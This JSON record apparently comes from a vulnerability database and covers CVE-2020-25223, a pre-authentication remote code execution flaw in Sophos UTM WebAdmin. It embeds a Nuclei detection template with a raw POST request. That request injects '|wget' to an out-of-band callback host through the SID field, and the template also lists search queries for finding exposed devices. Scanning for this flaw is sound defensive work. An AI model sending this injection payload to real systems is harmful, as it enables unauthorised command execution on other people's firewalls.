{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-25223/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-25223/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-25223/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-25223/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-25223/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-25223"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-25223"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.96753,
      "kev": true,
      "percentile": 0.99885
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2020/CVE-2020-25223.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2020-25223\n\ninfo:\n  name: Sophos UTM Preauth - Remote Code Execution\n  author: gy741\n  severity: critical\n  description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.\n  impact: |\n    Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system.\n  remediation: |\n    Apply the latest security patches provided by Sophos to mitigate the vulnerability.\n  reference:\n    - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223\n    - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-25223\n    - https://community.sophos.com/b/security-blog\n    - https://cwe.mitre.org/data/definitions/78.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-25223\n    cwe-id: CWE-78\n    epss-score: 0.96753\n    epss-percentile: 0.99885\n    cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: sophos\n    product: unified_threat_management\n    shodan-query: http.title:\"securepoint utm\"\n    fofa-query: title=\"securepoint utm\"\n    google-query: intitle:\"securepoint utm\"\n  tags: cve,cve2020,sophos,rce,oast,unauth,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /var HTTP/1.1\n        Host: {{Hostname}}\n        Accept: text/javascript, text/html, application/xml, text/xml, */*\n        Accept-Language: en-US,en;q=0.5\n        Accept-Encoding: gzip, deflate\n        X-Requested-With: XMLHttpRequest\n        X-Prototype-Version: 1.5.1.1\n        Content-Type: application/json; charset=UTF-8\n        Origin: {{BaseURL}}\n        Connection: close\n        Referer: {{BaseURL}}\n        Sec-Fetch-Dest: empty\n        Sec-Fetch-Mode: cors\n        Sec-Fetch-Site: same-origin\n\n        {\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n# digest: 4a0a0047304502210094ce76da1cbcdbf800611530216e056f007a7885e6ef205ff4916ee54bccfd1102206cedfe45f03aa473670190b9ce8d87b9d59a5138aa31e8d3c08da968fe0122f3:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2020-25223"
}